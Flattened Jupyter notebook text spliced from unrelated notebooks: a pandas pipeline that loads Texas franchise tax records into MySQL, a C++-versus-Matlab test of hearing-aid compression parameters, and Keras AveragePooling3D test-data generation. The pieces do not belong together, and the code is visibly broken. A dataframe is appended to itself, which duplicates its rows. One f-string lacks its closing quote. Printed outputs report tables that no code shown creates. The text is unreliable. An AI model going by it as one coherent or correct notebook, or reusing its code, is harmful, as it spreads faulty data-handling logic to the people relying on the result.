'Secretary_of_State_File_Number', 'SOS_Charter_Date', 'SOS_Status_Date', 'Current_Exempt_Reason_Code', 'Agent_Name', 'Agent_Address', 'Agent_City', 'Agent_State', 'Agent_Zip_Code'] # Franchise tax permit date ftact_head = ['Taxpayer_Number', 'Taxpayer_Name', 'Taxpayer_Address', 'Taxpayer_City', 'Taxpayer_State', 'Taxpayer_Zip_Code', 'Taxpayer_County_Code', 'Taxpayer_Organizational_Type', 'Taxpayer_Phone_Number', 'Record_Type_Code', 'Responsibility_Beginning_Date', 'Responsibility_End_Date', 'Responsibility_End_Reason_Code', 'Secretary_of_State_File_Number', 'SOS_Charter_Date', 'SOS_Status_Date', 'SOS_Status_Code', 'Rigth_to_Tansact_Business_Code', 'Current_Exempt_Reason_Code', 'Exempt_Begin_Date', 'NAICS_Code']Extract files from zipped folder# extract all files i = 0 for file in glob.glob(mydir + '/*.zip'): i += 1 zip = ZipFile(file, 'r') print(f'Extracting file {i}') zip.extractall(mydir) zip.close() print('Done!') print(f"File {i}, extracted: {file}\n") time.sleep(1) os.remove(file)Extracting file 1 Done! File 1, extracted: C:\DataAnalyticsBootCamp\WEEK_23 - Project 3\Project_3_Potential_Marketing\CRE_Marketing_Data\HotelOccupancyTaxData\FTACT.zip Extracting file 2 Done! File 2, extracted: C:\DataAnalyticsBootCamp\WEEK_23 - Project 3\Project_3_Potential_Marketing\CRE_Marketing_Data\HotelOccupancyTaxData\PP_files.zip Extracting file 3 Done! File 3, extracted: C:\DataAnalyticsBootCamp\WEEK_23 - Project 3\Project_3_Potential_Marketing\CRE_Marketing_Data\HotelOccupancyTaxData\Real_building_land.zip Extracting file 4 Done! File 4, extracted: C:\DataAnalyticsBootCamp\WEEK_23 - Project 3\Project_3_Potential_Marketing\CRE_Marketing_Data\HotelOccupancyTaxData\STACT.zipAdd csv files to a data frame ( fran and stp)# Searches for a csv file df_fran = pd.DataFrame() for file in glob.glob(mydir + '/*.csv'): if 'fran' in file: df = pd.read_csv(file, header=None, index_col=False, names=ftact_date_head, engine ='python') df_fran = df_fran.append(df) os.remove(file) print('Added the ' + file + " into the DF df_fran") print("deleted the file " + str(file)) else: print('we do not know what to do with this file: ' + str(file))FRAN DF createddf_fran.head()Adding the Taxpayer County Name and Record Type Name Column# Taxpayer Organization Type: df_fran.loc[(df_fran.Taxpayer_Organizational_Type == 'CF'),'Taxpayer_Organizational_Name']='Foreign Profit' # CF - Foreign Profit df_fran.loc[(df_fran.Taxpayer_Organizational_Type == 'CI'),'Taxpayer_Organizational_Name']='Limited Liability Company - Foreign'# CI - Limited Liability Company - Foreign df_fran.loc[(df_fran.Taxpayer_Organizational_Type == 'CL'),'Taxpayer_Organizational_Name']='Limited Liability Company - Texas' # CL - Limited Liability Company - Texas df_fran.loc[(df_fran.Taxpayer_Organizational_Type == 'CM'),'Taxpayer_Organizational_Name']='Foreign Non-Profit' # CM - Foreign Non-Profit df_fran.loc[(df_fran.Taxpayer_Organizational_Type == 'CN'),'Taxpayer_Organizational_Name']='Texas Non-Profit' # CN - Texas Non-Profit df_fran.loc[(df_fran.Taxpayer_Organizational_Type == 'CP'),'Taxpayer_Organizational_Name']='Professional' # CP - Professional df_fran.loc[(df_fran.Taxpayer_Organizational_Type == 'CR'),'Taxpayer_Organizational_Name']='Texas Insurance' # CR - Texas Insurance df_fran.loc[(df_fran.Taxpayer_Organizational_Type == 'CS'),'Taxpayer_Organizational_Name']='Foreign Insurance - OOS' # CS - Foreign Insurance - OOS df_fran.loc[(df_fran.Taxpayer_Organizational_Type == 'CT'),'Taxpayer_Organizational_Name']='Texas Profit' # CT - Texas Profit df_fran.loc[(df_fran.Taxpayer_Organizational_Type == 'CW'),'Taxpayer_Organizational_Name']='Texas Railroad Corporation' # CW - Texas Railroad Corporation df_fran.loc[(df_fran.Taxpayer_Organizational_Type == 'CX'),'Taxpayer_Organizational_Name']='Foreign Railroad Corporation - OOS' # CX - Foreign Railroad Corporation - OOS # Record Type Code: df_fran.loc[(df_fran.Record_Type_Code == 'U'),'Record_Type_Name']='Secretary of State (SOS) File Number' # U = Secretary of State (SOS) File Number df_fran.loc[(df_fran.Record_Type_Code == 'V'),'Record_Type_Name']='SOS Certificate of Authority (COA) File Number' # V = SOS Certificate of Authority (COA) File Number df_fran.loc[(df_fran.Record_Type_Code == 'X'),'Record_Type_Name']='Comptroller Assigned File Number' # X = Comptroller Assigned File Number df_fran.head()Date format# df_fran['SOS_Charter_Date'] = df_fran['SOS_Charter_Date'].str.strip() df_fran['SOS_Charter_Date'] = df_fran['SOS_Charter_Date'].fillna(0) df_fran['SOS_Status_Date'] = df_fran['SOS_Status_Date'].fillna(0) # df_fran['SOS_Charter_Date'] = df_fran['SOS_Charter_Date'].astype(np.int64) # df_fran['SOS_Status_Date'] = df_fran['SOS_Status_Date'].astype(np.int64) df_fran['Responsibility_Beginning_Date'] = df_fran['Responsibility_Beginning_Date'].astype(np.int64) df_fran['SOS_Charter_Date'] = pd.to_datetime(df_fran["SOS_Charter_Date"], format='%Y%m%d', errors='coerce') df_fran['SOS_Status_Date'] = pd.to_datetime(df_fran["SOS_Status_Date"], format='%Y%m%d', errors='coerce') df_fran['Responsibility_Beginning_Date'] = pd.to_datetime(df_fran["Responsibility_Beginning_Date"], format='%Y%m%d', errors='coerce') df_fran['SOS_Charter_Date'] =df_fran['SOS_Charter_Date'].dt.normalize() df_fran['SOS_Status_Date'] = df_fran['SOS_Status_Date'].dt.normalize() df_fran['Responsibility_Beginning_Date'] = df_fran['Responsibility_Beginning_Date'].dt.normalize() df_fran = df_fran[df_fran['Taxpayer_Zip_Code']!=0] df_fran.head()Checking column countdf_fran.count()Extracting textfile and storing into DF (FTOFFDIR, FTACT, STACT)for file in glob.glob(mydir + '/*.txt'): if 'FTACT' in file: df_ftact = pd.read_fwf(file, widths=[11, 50, 40, 20, 2, 5, 3, 2, 10, 1, 8, 8, 2, 10, 8, 8, 2, 1, 3, 8, 6], header=None, names=ftact_head, index_col=False, engine= 'python') # FTOOB, FTACT df_ftact = df_ftact.append(df_ftact) os.remove(file) print('Added the ' + file + ' into df_ftact') print('deleted the file ' + str(file)) else: os.remove(file) print('File not being used: ' + str(file))File not being used: C:\DataAnalyticsBootCamp\WEEK_23 - Project 3\Project_3_Potential_Marketing\CRE_Marketing_Data\HotelOccupancyTaxData\building_other.txt File not being used: C:\DataAnalyticsBootCamp\WEEK_23 - Project 3\Project_3_Potential_Marketing\CRE_Marketing_Data\HotelOccupancyTaxData\building_res.txt File not being used: C:\DataAnalyticsBootCamp\WEEK_23 - Project 3\Project_3_Potential_Marketing\CRE_Marketing_Data\HotelOccupancyTaxData\exterior.txt File not being used: C:\DataAnalyticsBootCamp\WEEK_23 - Project 3\Project_3_Potential_Marketing\CRE_Marketing_Data\HotelOccupancyTaxData\extra_features.txt File not being used: C:\DataAnalyticsBootCamp\WEEK_23 - Project 3\Project_3_Potential_Marketing\CRE_Marketing_Data\HotelOccupancyTaxData\extra_features_detail1.txt File not being used: C:\DataAnalyticsBootCamp\WEEK_23 - Project 3\Project_3_Potential_Marketing\CRE_Marketing_Data\HotelOccupancyTaxData\extra_features_detail2.txt File not being used: C:\DataAnalyticsBootCamp\WEEK_23 - [...]FTACT DF createddf_ftact.head()Taxpayer_Organizational_Name and Record_Type_Name Column# Taxpayer Organization Type: df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'AB'),'Taxpayer_Organizational_Name']='Texas Business Association' # AB – Texas Business Association df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'AC'),'Taxpayer_Organizational_Name']='Foreign Business Association' # AC – Foreign Business Association df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'AF'),'Taxpayer_Organizational_Name']='Foreign Professional Association' # AF – Foreign Professional Association df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'AP'),'Taxpayer_Organizational_Name']='Texas Professional Association' # AP – Texas Professional Association df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'AR'),'Taxpayer_Organizational_Name']='Other Association' # AR – Other Association df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'CF'),'Taxpayer_Organizational_Name']='Foreign Profit' # CF - Foreign Profit df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'CI'),'Taxpayer_Organizational_Name']='Limited Liability Company - Foreign' # CI - Limited Liability Company - Foreign df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'CL'),'Taxpayer_Organizational_Name']='Limited Liability Company - Texas' # CL - Limited Liability Company - Texas df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'CM'),'Taxpayer_Organizational_Name']='Foreign Non-Profit' # CM - Foreign Non-Profit df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'CN'),'Taxpayer_Organizational_Name']='Texas Non-Profit' # CN - Texas Non-Profit df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'CP'),'Taxpayer_Organizational_Name']='Professional' # CP - Professional df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'CR'),'Taxpayer_Organizational_Name']='Texas Insurance' # CR - Texas Insurance df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'CS'),'Taxpayer_Organizational_Name']='Foreign Insurance - OOS' # CS - Foreign Insurance - OOS df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'CT'),'Taxpayer_Organizational_Name']='Texas Profit' # CT - Texas Profit df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'CU'),'Taxpayer_Organizational_Name']='Foreign Professional Corporation' # CU – Foreign Professional Corporation df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'CW'),'Taxpayer_Organizational_Name']='Texas Railroad Corporation' # CW - Texas Railroad Corporation df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'CX'),'Taxpayer_Organizational_Name']='Foreign Railroad Corporation - OOS' # CX - Foreign Railroad Corporation – OOS df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'HF'),'Taxpayer_Organizational_Name']='Foreign Holding Company' # HF – Foreign Holding Company df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'PB'),'Taxpayer_Organizational_Name']='Business General Partnership' # PB – Business General Partnership df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'PF'),'Taxpayer_Organizational_Name']='Foreign Limited Partnership' # PF – Foreign Limited Partnership df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'PI'),'Taxpayer_Organizational_Name']='Individual General Partnership' # PI – Individual General Partnership df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'PL'),'Taxpayer_Organizational_Name']='Texas Limited Partnership' # PL – Texas Limited Partnership df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'PV'),'Taxpayer_Organizational_Name']='Texas Joint Venture' # PV – Texas Joint Venture df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'PW'),'Taxpayer_Organizational_Name']='Foreign Joint Venture' # PW – Foreign Joint Venture df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'PX'),'Taxpayer_Organizational_Name']='Texas Limited Liability Partnership' # PX – Texas Limited Liability Partnership df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'PY'),'Taxpayer_Organizational_Name']='Foreign Limited Liability Partnerhsip' # PY – Foreign Limited Liability Partnerhsip df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'SF'),'Taxpayer_Organizational_Name']='Foreign Joint Stock Company' # SF – Foreign Joint Stock Company df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'ST'),'Taxpayer_Organizational_Name']='Texas Joint Stock Company' # ST – Texas Joint Stock Company df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'TF'),'Taxpayer_Organizational_Name']='Foreign Business Trust' # TF – Foreign Business Trust df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'TH'),'Taxpayer_Organizational_Name']='Texas Real Estate Investment Trust' # TH – Texas Real Estate Investment Trust df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'TI'),'Taxpayer_Organizational_Name']='Foreign Real Estate Investment Trust' # TI – Foreign Real Estate Investment Trust df_ftact.loc[(df_ftact.Taxpayer_Organizational_Type == 'TR'),'Taxpayer_Organizational_Name']='Texas Business Trust' # TR – Texas Business Trust # Record Type Code: df_ftact.loc[(df_ftact.Record_Type_Code == 'U'),'Record_Type_Name']='Secretary of State (SOS) File Number' # U = Secretary of State (SOS) File Number df_ftact.loc[(df_ftact.Record_Type_Code == 'V'),'Record_Type_Name']='SOS Certificate of Authority (COA) File Number' # V = SOS Certificate of Authority (COA) File Number df_ftact.loc[(df_ftact.Record_Type_Code == 'X'),'Record_Type_Name']='Comptroller Assigned File Number' # X = Comptroller Assigned File Number df_ftact.head() # (Description for context) SOS Charter/COA: # Depending on the Record Type Code value, this number # is the SOS, COA or Comptroller Assigned File Number. # If the Record Type Code is an 'X', this field will be # blank. They do not have a current SOS Charter/COA.Responsibility_End_Reason_Name column# Responsibility End Reason Code: # This is for mostly for Record Type Code value 'X'. df_ftact.loc[(df_ftact.Responsibility_End_Reason_Code == 0),'Responsibility_End_Reason_Name']='Active or Inactive with no Reason Code' # 00 = Active or Inactive with no Reason Code df_ftact.loc[(df_ftact.Responsibility_End_Reason_Code == 1),'Responsibility_End_Reason_Name']='Discountinued Doing Business' # 01 = Discountinued Doing Business df_ftact.loc[(df_ftact.Responsibility_End_Reason_Code == 2),'Responsibility_End_Reason_Name']='Dissolved in Home State' # 02 = Dissolved in Home State df_ftact.loc[(df_ftact.Responsibility_End_Reason_Code == 3),'Responsibility_End_Reason_Name']='Merged Out of Existence' # 03 = Merged Out of Existence df_ftact.loc[(df_ftact.Responsibility_End_Reason_Code == 4),'Responsibility_End_Reason_Name']='Converted' # 04 = Converted df_ftact.loc[(df_ftact.Responsibility_End_Reason_Code == 5),'Responsibility_End_Reason_Name']='Consolidated' # 05 = Consolidated df_ftact.loc[(df_ftact.Responsibility_End_Reason_Code == 6),'Responsibility_End_Reason_Name']='Forfeited in Home State' # 06 = Forfeited in Home State df_ftact.loc[(df_ftact.Responsibility_End_Reason_Code == 8),'Responsibility_End_Reason_Name']='No Nexus' # 08 = No Nexus df_ftact.loc[(df_ftact.Responsibility_End_Reason_Code == 9),'Responsibility_End_Reason_Name']='No Nexus – Dates not the same' # 09 = No Nexus – Dates not the same df_ftact.loc[(df_ftact.Responsibility_End_Reason_Code == 11),'Responsibility_End_Reason_Name']='Special Information Report' # 11 = Special Information Report df_ftact.head()SOS_Status_Name Column# (Context description) SOS Charter/COA: # Depending on the Record Type Code value, this number # is the SOS, COA or Comptroller Assigned File Number. # If the Record Type Code is an 'X', this field will be # blank. They do not have a current SOS Charter/COA. # SOS Status Code: # For Charter/COA Numbers: df_ftact.loc[(df_ftact.SOS_Status_Code == 'A'),'SOS_Status_Name']='Active' # A = Active df_ftact.loc[(df_ftact.SOS_Status_Code == 'B'),'SOS_Status_Name']='Consolidated' # B = Consolidated df_ftact.loc[(df_ftact.SOS_Status_Code == 'C'),'SOS_Status_Name']='Converted' # C = Converted df_ftact.loc[(df_ftact.SOS_Status_Code == 'D'),'SOS_Status_Name']='Dissolved' # D = Dissolved df_ftact.loc[(df_ftact.SOS_Status_Code == 'E'),'SOS_Status_Name']='Expired' # E = Expired df_ftact.loc[(df_ftact.SOS_Status_Code == 'F'),'SOS_Status_Name']='Forfeited Franchise Tax' # F = Forfeited Franchise Tax df_ftact.loc[(df_ftact.SOS_Status_Code == 'G'),'SOS_Status_Name']='Miscellaneous' # G = Miscellaneous df_ftact.loc[(df_ftact.SOS_Status_Code == 'I'),'SOS_Status_Name']='Closed by FDIC' # I = Closed by FDIC df_ftact.loc[(df_ftact.SOS_Status_Code == 'J'),'SOS_Status_Name']='State Charter Pulled' # J = State Charter Pulled df_ftact.loc[(df_ftact.SOS_Status_Code == 'K'),'SOS_Status_Name']='Forfeited Registered Agent' # K = Forfeited Registered Agent df_ftact.loc[(df_ftact.SOS_Status_Code == 'L'),'SOS_Status_Name']='Forfeited Registered Office' # L = Forfeited Registered Office df_ftact.loc[(df_ftact.SOS_Status_Code == 'M'),'SOS_Status_Name']='Merger' # M = Merger df_ftact.loc[(df_ftact.SOS_Status_Code == 'N'),'SOS_Status_Name']='Forfeited Hot Check' # N = Forfeited Hot Check df_ftact.loc[(df_ftact.SOS_Status_Code == 'P'),'SOS_Status_Name']='Forfeited Court Order' # P = Forfeited Court Order df_ftact.loc[(df_ftact.SOS_Status_Code == 'R'),'SOS_Status_Name']='Reinstated' # R = Reinstated df_ftact.loc[(df_ftact.SOS_Status_Code == 'T'),'SOS_Status_Name']='Terminated' # T = Terminated df_ftact.loc[(df_ftact.SOS_Status_Code == 'W'),'SOS_Status_Name']='Withdrawn' # W = Withdrawn df_ftact.loc[(df_ftact.SOS_Status_Code == 'Y'),'SOS_Status_Name']='Dead at Conversion 69' # Y = Dead at Conversion 69 df_ftact.loc[(df_ftact.SOS_Status_Code == 'Z'),'SOS_Status_Name']='Dead at Conversion 83' # Z = Dead at Conversion 83 df_ftact.head()Rigth_to_Tansact_Business_Name Column# Exempt Reason Code: # blank = Not Exempt # rest = Exempt for various reasons. A list of value descriptions # may be requested separately. # Right to Transact Business Code: # blank = Franchise Tax Ended df_ftact.loc[(df_ftact.Rigth_to_Tansact_Business_Code == 'A'),'Rigth_to_Tansact_Business_Name']='Active' # A = Active df_ftact.loc[(df_ftact.Rigth_to_Tansact_Business_Code == 'D'),'Rigth_to_Tansact_Business_Name']='Active – Eligible for Termination/Withdrawl' # D = Active – Eligible for Termination/Withdrawl df_ftact.loc[(df_ftact.Rigth_to_Tansact_Business_Code == 'N'),'Rigth_to_Tansact_Business_Name']='Forfeited' # N = Forfeited df_ftact.loc[(df_ftact.Rigth_to_Tansact_Business_Code == 'I'),'Rigth_to_Tansact_Business_Name']='Franchise Tax Involuntarily Ended' # I = Franchise Tax Involuntarily Ended df_ftact.loc[(df_ftact.Rigth_to_Tansact_Business_Code == 'U'),'Rigth_to_Tansact_Business_Name']='Franchise Tax Not Established' # U = Franchise Tax Not Established df_ftact.head()Formating data* changing float to int* adding datetime formatdf_ftact['Taxpayer_Zip_Code'] = df_ftact['Taxpayer_Zip_Code'].fillna(0) df_ftact['SOS_Charter_Date'] = df_ftact['SOS_Charter_Date'].fillna(0) df_ftact['SOS_Status_Date'] = df_ftact['SOS_Status_Date'].fillna(0) df_ftact['Secretary_of_State_File_Number'] = df_ftact['Secretary_of_State_File_Number'].fillna(0) df_ftact['NAICS_Code'] = df_ftact['NAICS_Code'].fillna(0) df_ftact['Current_Exempt_Reason_Code'] = df_ftact['Current_Exempt_Reason_Code'].fillna(0) df_ftact['Taxpayer_Zip_Code'] = df_ftact['Taxpayer_Zip_Code'].astype(np.int64) df_ftact['SOS_Charter_Date'] = df_ftact['SOS_Charter_Date'].astype(np.int64) df_ftact['SOS_Status_Date'] = df_ftact['SOS_Status_Date'].astype(np.int64) df_ftact['Responsibility_Beginning_Date'] = df_ftact['Responsibility_Beginning_Date'].astype(np.int64) df_ftact['Secretary_of_State_File_Number'] = df_ftact['Secretary_of_State_File_Number'].astype(np.int64) df_ftact['NAICS_Code'] = df_ftact['NAICS_Code'].astype(np.int64) df_ftact['Current_Exempt_Reason_Code'] = df_ftact['Current_Exempt_Reason_Code'].astype(np.int64) df_ftact['SOS_Charter_Date'] = pd.to_datetime(df_ftact["SOS_Charter_Date"], format='%Y%m%d', errors='coerce') df_ftact['SOS_Status_Date'] = pd.to_datetime(df_ftact["SOS_Status_Date"], format='%Y%m%d', errors='coerce') df_ftact['Responsibility_Beginning_Date'] = pd.to_datetime(df_ftact["Responsibility_Beginning_Date"], format='%Y%m%d', errors='coerce') df_ftact['SOS_Charter_Date'] = df_ftact['SOS_Charter_Date'].dt.normalize() df_ftact['SOS_Status_Date'] = df_ftact['SOS_Status_Date'].dt.normalize() df_ftact['Responsibility_Beginning_Date'] = df_ftact['Responsibility_Beginning_Date'].dt.normalize() df_ftact = df_ftact[df_ftact['Taxpayer_Zip_Code']!=0] df_ftact.head()Upload DF's to Database* Adding database connection* Defining the Engine** I was getting charmap error when attempting to drop the data to the database. I defined encoding = utf-8, yet it still did not work. Only when I hardcoded charset within the engine string is when the error finally went away.connection_string = f"{mysql_user}:{mysql_password}@localhost:3306/{db_name}?charset=utf8" engine = create_engine(f'mysql://{connection_string}') engine.table_names()Creating two variables for today's date and today's datetimecurrentDT = datetime.datetime.now() DateTimeSent = currentDT.strftime("%Y-%m-%d %H:%M:%S") dateCSV = currentDT.strftime("%Y-%m-%d") print(dateCSV) print(DateTimeSent)2020-03-25 2020-03-25 02:13:35Calling Database tables for crosreferencing df data, to have non-duplicated data* Grabing data from the database and storing the tax number column into a dataframeftact_in_db = pdsql.read_sql("SELECT Taxpayer_Number FROM franchise_tax_info",engine) print(f"Data count for ftact from the database : {len(ftact_in_db)}\n) try: if df_fran.size != 0: print(f"\nData count from the new df data for df_fran: {len(df_fran)}") except Exception as e: print("df_fran does not exist. Check your data source if it is available") try: if df_ftact.size != 0: print(f"Data count from the new df data for df_ftact: {len(df_ftact)}") except Exception as e: print("df_ftact does not exist. Check your data source if it is available")Data count for ftact from the database : 0 Data count for stact from the Database: 0 Data count for ftoffdir from the Database: 0 Data count from the new df data for df_ftact: 4236082 Data count from the new df data for df_stact: 1554488 df_ftoffdir does not exist. Check your data source if it is availableFTACT aka df_ftact Checking table df with df data to make sure their are not duplicate tax paying numbers* filtering new ftact with data from the database* Checking data for ftact and also adding a new column of today's date and time* Appending new companies (df_ftact) to csv and Databasetry: df_ftact = df_ftact[~df_ftact['Taxpayer_Number'].astype(int).isin(ftact_in_db['Taxpayer_Number'].astype(int))] if df_ftact.size != 0: df_ftact['DateTime'] = DateTimeSent print(f"There are {len(ftact_in_db)} data attributes in ftact table from the database\n{len(df_ftact)} new companies, based on tax payer number from filtered data df_tact") df_ftact.to_sql(name='franchise_tax_info', con=engine, if_exists='append', index=False, chunksize=1000) print(f"ftact to database append, completed") f = open('HotelOccupancyTaxData/formattedData/DBUploadRecord.txt','a+') f.write(f'{DateTimeSent}\nftact_{dateCSV}.csv, {len(df_ftact)}, franchise_tax_info table, {len(ftact_in_db)}\n') f.close() else: print("No new data") f = open('HotelOccupancyTaxData/formattedData/DBUploadRecord.txt','a+') f.write(f'{DateTimeSent}\nftact_{dateCSV}.csv, {len(df_ftact)}, franchise_tax_info table, {len(ftact_in_db)}\n') f.close() except Exception as e: print(f"Something went wrong, df_ftact was not able to append to database or no new data: {e}")There are 0 data attributes in ftact table from the database 4236082 new companies, based on tax payer number from filtered data df_tact ftact to database append, completedCall the tables within the database and store into a variable* Going to compare new data from database with the df_franftact_date_in_db = pdsql.read_sql("SELECT Taxpayer_Number FROM franchise_tax_info_date",engine) print(f"There are {len(ftact_date_in_db)} records in frachise tax permit date table.\n")There are 0 records in frachise tax permit date table. There are 0 records in sales tax permit date table.fran aka df_fran Checking table df with df data to make sure their are not duplicate tax paying numbers* filtering new df_fran with data from the database* Checking data for df_fran and also adding a new column of today's date and time* Appending new companies (fran) to csv and Databasetry: df_fran = df_fran[~df_fran['Taxpayer_Number'].astype(int).isin(ftact_date_in_db['Taxpayer_Number'].astype(int))] if df_fran.size != 0: df_fran['DateTime'] = DateTimeSent print(f"There are {len(ftact_date_in_db)} data attributes in df_fran table from the database\n{len(df_fran)} new companies, based on tax payer number from filtered data df_fran") df_fran.to_sql(name='franchise_tax_info_date', con=engine, if_exists='append', index=False, chunksize=1000) print(f"df_fran to database append, completed") f = open('HotelOccupancyTaxData/formattedData/DBUploadRecord.txt','a+') f.write(f'fran_{dateCSV}.csv, {len(df_fran)}, franchise_tax_info_date table, {len(ftact_date_in_db)}\n') f.close() else: print("No new data") f = open('HotelOccupancyTaxData/formattedData/DBUploadRecord.txt','a+') f.write(f'fran_{dateCSV}.csv, {len(df_fran)}, franchise_tax_info_date table, {len(ftact_date_in_db)}\n') f.close() except Exception as e: print(f"Something went wrong, df_fran was not able to append to database: {e}")There are 0 data attributes in df_fran table from the database 111888 new companies, based on tax payer number from filtered data df_fran df_fran to database append, completedTesting WDRC With 8000 Hz SIgnal C++ and Matlab Summary - Near Perfect MatchAs close as can be with c++ using 32-bit floats.# make Jupyter use the whole width of the browser from IPython.display import Image, display, HTML display(HTML("")) import sys sys.path.append('..') import numpy as np from mlab import call_matlab, generate_sine_waves, plot_fft from rtmha.elevenband import Wdrc11 import plotly.graph_objects as go inp = np.zeros(2048, dtype=np.float32) inp[0] = 1 g50 = np.array([ 30, 20, 25,2,15,20,0,0,0,0,0], np.float32) g80 = np.array([ 0,-10,-5, 0,0,0,0,0,-.1,-1,-10], np.float32) kneelow = np.ones(11) * 45 band_mpo = np.ones(11) * 120 AT = np.ones(11) * 10 RT = np.ones(11) * 100 min_phase=1 align=1 res = call_matlab(min_phase, align, inp, g50, g80, kneelow, band_mpo, AT, RT) res['g50'] res['g80'] res['alpha1'] res['c'] w = Wdrc11(g50, g80, kneelow, band_mpo, AT, RT, len(inp), min_phase, align) # just verifies the input parameters w.get_param() m, b, c, kneeup, alpha1, alpha2 = w.get_param_test() kneeup g50 = np.array([ 5, -0.001, 0, 0,0,0,0,0,0,0,0], np.float32) g80 = np.array([ 10,0,-0.001, 0,0,0,0,0,0,0,0], np.float32) res = call_matlab(min_phase, align, inp, g50, g80, kneelow, band_mpo, AT, RT) res['m'] res['alpha2'] w = Wdrc11(g50, g80, kneelow, band_mpo, AT, RT, len(inp), min_phase, align) m, b, c, kneeup, alpha1, alpha2 = w.get_param_test() m g80 kneeup alpha1AveragePooling3D **[pooling.AveragePooling3D.0] input 4x4x4x2, pool_size=(2, 2, 2), strides=None, padding='valid', data_format='channels_last'**data_in_shape = (4, 4, 4, 2) L = AveragePooling3D(pool_size=(2, 2, 2), strides=None, padding='valid', data_format='channels_last') layer_0 = Input(shape=data_in_shape) layer_1 = L(layer_0) model = Model(inputs=layer_0, outputs=layer_1) # set weights to random (use seed for reproducibility) np.random.seed(290) data_in = 2 * np.random.random(data_in_shape) - 1 result = model.predict(np.array([data_in])) data_out_shape = result[0].shape data_in_formatted = format_decimal(data_in.ravel().tolist()) data_out_formatted = format_decimal(result[0].ravel().tolist()) print('') print('in shape:', data_in_shape) print('in:', data_in_formatted) print('out shape:', data_out_shape) print('out:', data_out_formatted) DATA['pooling.AveragePooling3D.0'] = { 'input': {'data': data_in_formatted, 'shape': data_in_shape}, 'expected': {'data': data_out_formatted, 'shape': data_out_shape} }in shape: (4, 4, 4, 2) in: [-0.453175, -0.475078, 0.486234, -0.949643, -0.349099, -0.837108, 0.933439, 0.167853, -0.995191, 0.459466, -0.788337, -0.120985, 0.06215, 0.138625, -0.102201, 0.976605, -0.591051, -0.592066, 0.469334, -0.435067, 0.621416, 0.817698, 0.790015, 0.485862, 0.469679, -0.611443, 0.582845, -0.503885, -0.379174, -0.451035, 0.052289, 0.131836, -0.609312, -0.828722, -0.422428, -0.648754, -0.339801, -0.758017, 0.754244, -0.544823, 0.691656, 0.076848, -0.32539, 0.306448, -0.662415, 0.334329, 0.030666, -0.414111, -0.757096, -0.20427, -0.893088, -0.681919, -0.619269, -0.640749, 0.867436, 0.971453, -0.42039, -0.574905, -0.34642, 0.588678, -0.247265, 0.436084, 0.220126, 0.114202, 0.613623, 0.401452, -0.270262, -0.591146, -0.872383, 0.818368, 0.336808, 0.338197, -0.275646, 0.375308, -0.928722, -0.836727, -0.504007, -0.503397, -0.636099, 0.948482, -0.639661, -0.026878, -0.122643, -0.634018, -0.247016, 0.517246, -0.398639, 0.752174, -0.014633, -0.170534, -0.463453, -0.289716, 0[...]**[pooling.AveragePooling3D.1] input 4x4x4x2, pool_size=(2, 2, 2), strides=(1, 1, 1), padding='valid', data_format='channels_last'**data_in_shape = (4, 4, 4, 2) L = AveragePooling3D(pool_size=(2, 2, 2), strides=(1, 1, 1), padding='valid', data_format='channels_last') layer_0 = Input(shape=data_in_shape) layer_1 = L(layer_0) model = Model(inputs=layer_0, outputs=layer_1) # set weights to random (use seed for reproducibility) np.random.seed(291) data_in = 2 * np.random.random(data_in_shape) - 1 result = model.predict(np.array([data_in])) data_out_shape = result[0].shape data_in_formatted = format_decimal(data_in.ravel().tolist()) data_out_formatted = format_decimal(result[0].ravel().tolist()) print('') print('in shape:', data_in_shape) print('in:', data_in_formatted) print('out shape:', data_out_shape) print('out:', data_out_formatted) DATA['pooling.AveragePooling3D.1'] = { 'input': {'data': data_in_formatted, 'shape': data_in_shape}, 'expected': {'data': data_out_formatted, 'shape': data_out_shape} }in shape: (4, 4, 4, 2) in: [-0.803361, 0.348731, 0.30124, -0.168638, 0.516406, -0.258765, 0.297839, 0.993235, 0.958465, -0.273175, -0.704992, 0.261477, -0.301255, 0.263104, 0.678631, -0.644936, -0.029034, -0.320266, 0.307733, -0.479016, 0.608177, 0.034951, 0.456908, -0.929353, 0.594982, -0.243058, -0.524918, 0.455339, 0.034216, 0.356824, 0.63906, -0.259773, -0.084724, 0.248472, -0.608134, 0.0077, 0.400591, -0.960703, -0.247926, -0.774509, 0.496174, -0.319044, -0.324046, -0.616632, -0.322142, -0.472846, 0.171825, -0.030013, 0.992861, -0.645264, 0.524886, 0.673229, 0.883122, 0.25346, -0.706988, -0.654436, 0.918349, -0.139113, 0.742737, 0.338472, -0.812719, 0.860081, 0.003489, 0.667897, 0.362284, -0.283972, 0.995162, 0.67962, -0.700244, -0.137142, 0.045695, -0.450433, 0.929977, 0.157542, -0.720517, -0.939063, 0.295004, 0.308728, -0.094057, -0.374756, -0.400976, -0.539654, 0.27965, 0.977688, -0.361264, -0.027757, -0.67149, 